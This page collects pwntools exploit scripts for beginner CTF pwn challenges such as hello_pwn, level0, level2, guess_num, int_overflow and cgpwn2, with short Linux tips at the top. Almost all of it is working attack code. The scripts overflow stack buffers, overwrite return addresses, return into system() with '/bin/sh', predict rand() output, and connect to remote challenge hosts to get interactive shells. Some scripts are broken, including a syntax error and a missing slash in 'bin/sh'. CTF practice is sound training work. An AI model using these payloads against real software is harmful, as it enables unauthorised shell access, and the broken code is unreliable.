Tips:
ubuntu执行属性为executable (application/x-executable)的文件的方法:
1. chmod +x filename
2. ./filename
file filename #查看文件类型
checksec --file=filename #查看文件的保护
#新建py文件
touch 0.py
简单的模板
from pwn import *

# Exploit template: pick local/remote below, then send one overflow payload.
context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')
content = 0  # 1 = run the local binary, anything else = connect to the remote service
# Hard-coded return target; an absolute address like this presumably assumes a
# non-PIE binary (see the checksec tip at the top of the page) — confirm.
sys_addr = 0x401186


def main() -> None:
    """Open the tube, send filler + packed address, then hand the tube to the user."""
    if content == 1:
        io = process("./pwn1")
        # run the local program
    else:
        io = remote("node4.buuoj.cn",28761)
        # connect to the program on the remote server
    # 0xF bytes of filler followed by sys_addr packed as 8 bytes (p64, little-endian
    # under the default context).
    payload = b'a'*(0xF)+p64(sys_addr)
    io.sendline(payload)
    io.interactive()


main()  # run main()
1、when did you born.
from pwn import *

context (os='linux',arch="amd64",log_level="debug")
content = 1  # 1 = run the local binary, anything else = connect to the remote service


def main() -> None:
    """Answer the two prompts; the second answer overwrites the stored value with 1926."""
    if content == 1:
        # NOTE(review): "peiqi= =" is a SyntaxError as written — this script does not
        # parse until it reads `peiqi = process(...)`.
        peiqi= = process("1-when_did_you_born")
        # run the local program
    else :
        peiqi = remote("220.249.52.133",37645)
        # connect to the remote program
    # (0x20-0x18) = 8 bytes of filler, then 1926 packed as an 8-byte value.
    payload = b'a' * (0x20-0x18) + p64(1926)
    # filler + 64-bit encoding of 1926
    # NOTE(review): str is passed to recvuntil/sendline below; pwntools encodes it,
    # but newer releases warn — a bytes literal avoids that (confirm against the
    # installed version).
    peiqi.recvuntil("What's Your Birth?\n")  # wait for the prompt
    peiqi.sendline("1900")  # first answer
    peiqi.recvuntil("What's Your Name?\n")
    peiqi.sendline(payload)
    peiqi.interactive()


main()  # run main()
2、hello_pwn
from pwn import *

context (os='linux',arch="amd64",log_level="debug")
content = 0  # 1 = run the local binary, anything else = connect to the remote service


def main() -> None:
    """Send filler plus one packed 64-bit constant after the banner."""
    if content == 1:
        peiqi = process("2")
        # run the local program
    else :
        peiqi = remote("111.200.241.244",64685)
        # connect to the remote program
    # (0x6c-0x68) = 4 bytes of filler, then the constant 1853186401 packed as 8 bytes.
    # NOTE(review): the original comment said "1926" here; that was copied from the
    # previous script — the value actually packed is 1853186401.
    payload = b'a' * (0x6c-0x68) + p64(1853186401)
    peiqi.recvuntil("lets get helloworld for bof\n")  # wait for the banner
    peiqi.sendline(payload)
    peiqi.interactive()


main()  # run main()
3、level 0
from pwn import *

context (os='linux',arch="amd64",log_level="debug")
content = 0  # 1 = run the local binary, anything else = connect to the remote service
elf = ELF("0")
# Resolve the target from the ELF symbol table instead of hard-coding it.
system_addr = elf.symbols["callsystem"]


def main() -> None:
    """Overwrite the saved return address with the address of `callsystem`."""
    if content == 1:
        peiqi = process("0")
        # run the local program
    else :
        peiqi = remote("111.200.241.244",51297)
        # connect to the remote program
    # 0x80 bytes of buffer + 8 bytes (presumably the saved frame pointer), then the
    # 8-byte packed address that lands on the saved return address.
    payload = b'a' * (0x80 + 8) + p64(system_addr)
    peiqi.recvuntil("Hello, World\n")  # wait for the banner
    peiqi.sendline(payload)
    peiqi.interactive()


main()  # run main()
4、level 2
from pwn import *

# NOTE(review): "x86" does not look like a pwntools arch name — the other 32-bit
# script on this page uses 'i386'; confirm context accepts it.
context (os='linux',arch="x86",log_level="debug")
content = 0  # 1 = run the local binary, anything else = connect to the remote service
elf = ELF("2")
system_plt_addr = elf.plt["system"]
# First occurrence of "/bin/sh" inside the binary's own mapped data.
bin_sh_addr = next(elf.search(b"/bin/sh"))


def main() -> None:
    """32-bit ret2plt: return into system@plt with "/bin/sh" as its argument."""
    if content == 1:
        peiqi = process("2")
        # run the local program
    else :
        peiqi = remote("111.200.241.244",55628)
        # connect to the remote program
    # 0x88 + 4 bytes of filler, then system@plt as the 4-byte return address.
    payload = b'a' * (0x88 + 4) + p32(system_plt_addr)
    # "aaaa" presumably stands in for system()'s own return address (cdecl), and
    # bin_sh_addr is then read as its first argument.
    payload = payload +b"aaaa" + p32(bin_sh_addr)
    peiqi.sendlineafter("Input:\n",payload)  # wait for the prompt, then send
    peiqi.interactive()


main()  # run main()
5、guess_num
from platform import libc_ver  # NOTE(review): unused in this script
from pwn import *
from ctypes import *

context (os='linux',arch="amd64",log_level="debug")
content = 0  # 1 = run the local binary, anything else = connect to the remote service


def srand() -> None:
    """Answer ten rounds with rand()%6+1 values generated from srand(1)."""
    # Loads the *host* libc; this only reproduces the target's sequence if the
    # remote program seeds with srand(1) and uses the same rand() — TODO confirm.
    lib = cdll.LoadLibrary("libc.so.6")
    lib.srand(1)
    for i in range(10):
        number = str(lib.rand()%6 + 1)
        # `peiqi` is the module-level tube set by main().
        peiqi.recvuntil("Welcome to a guess number game!")
        peiqi.sendline(number)


def main() -> None:
    """Open the tube, send the name payload (seed overwrite), then play the rounds."""
    global peiqi
    try:
        if content == 1:
            peiqi = process("2")
            # run the local program
        else :
            peiqi = remote("111.200.241.244",52742)
            # connect to the remote program
    except:
        # NOTE(review): a bare except hides the real failure (e.g. a refused
        # connection) and leaves `peiqi` unbound, so the recvuntil below then
        # dies with a NameError instead of the original exception.
        print("[!!]the exp is content erroe~\n")
    # (0x30-0x10) = 32 bytes of filler, then the value 1 packed as 8 bytes.
    payload = b"a" * (0x30-0x10) + p64(1)
    peiqi.recvuntil("Your name:")
    peiqi.sendline(payload)
    srand()
    peiqi.interactive()


main()  # run main()
6、rip
from pwn import *

context (os='linux',arch="amd64",log_level="debug")
content = 0  # 1 = run the local binary, anything else = connect to the remote service
elf = ELF("pwn1")
# Resolve the target function from the symbol table.
system_addr = elf.symbols["fun"]


def main() -> None:
    """Send filler plus the packed address of `fun`."""
    if content == 1:
        peiqi = process("pwn1")
        # run the local program
    else :
        peiqi = remote("node4.buuoj.cn",29944)
        # connect to the remote program
    # (0x0f-0x00) = 15 bytes of filler, then the 8-byte packed address.
    payload = b'a' * (0x0f-0x00) + p64(system_addr)
    peiqi.sendline(payload)
    peiqi.interactive()


main()  # run main()
7、guess_num
from pwn import *

context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')
content = 0  # 1 = run the local binary, anything else = connect to the remote service
sys_addr = 0x401186  # NOTE(review): assigned but never used in this script


def main() -> None:
    """Send the name payload, then answer ten rounds from a precomputed list."""
    if content == 1:
        io = process("./pwn1")
        # run the local program
    else:
        io = remote("111.200.241.244",57277)
        # connect to the program on the remote server
    # 0x20 bytes of filler, then 0 packed as 8 bytes.
    payload = b'a'*(0x20)+p64(0)
    io.sendlineafter("Your name:", payload)
    # Ten precomputed answers, one per round; presumably the rand()%6+1 sequence
    # that the other guess_num script on this page generates with srand(1).
    rand = ['2','5','4','2','6','2','5','1','4','2']
    for i in range(10):
        io.sendlineafter("Please input your guess number:",rand[i])
    io.interactive()


main()  # run main()
8、int_overflow
from pwn import *

#context (os='Linux',arch='amd64',log_level='debug')
context (os='Linux',arch='i386',log_level='debug')
content = 0  # 1 = run the local binary, anything else = connect to the remote service
# Hard-coded 32-bit return target; presumably assumes a non-PIE binary — confirm.
sys_addr = 0x804868B


def main() -> None:
    """Log in through the menu, then send an over-long password carrying the payload."""
    if content == 1:
        io = process("./pwn1")
        # run the local program
    else:
        io = remote("111.200.241.244", 64970)
        # connect to the program on the remote server
    # 0x18 bytes of filler, then the 4-byte packed address.
    payload = b'a'*(0x18)+p32(sys_addr)
    # Pad the whole string out to 262 bytes, i.e. into the (258, 263] range the
    # author notes; the length check being bypassed is not visible here.
    payload = payload.ljust(262, b'a')
    # pad the string length into (258,263]
    io.recvuntil("Your choice:")
    io.sendline('1')
    io.recvuntil("username:")
    io.sendline('asd')
    io.recvuntil("passwd:")
    io.sendline(payload)
    io.interactive()


main()  # run main()
9、cgpwn2
from pwn import *

#context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')
# NOTE(review): no context is set here, so the default arch applies; the
# payload below is built with p32, i.e. it targets a 32-bit binary.
elf = ELF('./1')
content = 0  # 1 = run the local binary, anything else = connect to the remote service
sys_addr = elf.symbols['system']
# Hard-coded data address; presumably where the first input is stored — confirm.
my_addr = 0x804A080


def main() -> None:
    """Write a string into the binary, then return into system() with it as the argument."""
    if content == 1:
        io = process("./pwn1")
        # run the local program
    else:
        io = remote("111.200.241.244", 61382)
        # connect to the program on the remote server
    # (0x26+4) bytes of filler, system's address as the return address, 0 as
    # system()'s own return address, my_addr as its first argument.
    payload = b'a'*(0x26+4)+p32(sys_addr)+p32(0)+p32(my_addr)
    io.recv()  # drain the first prompt
    # First input: the string later passed to system(), as written on the page.
    io.sendline('bin/sh\x00')
    io.recv()  # drain the second prompt
    io.sendline(payload)
    io.interactive()


main()  # run main()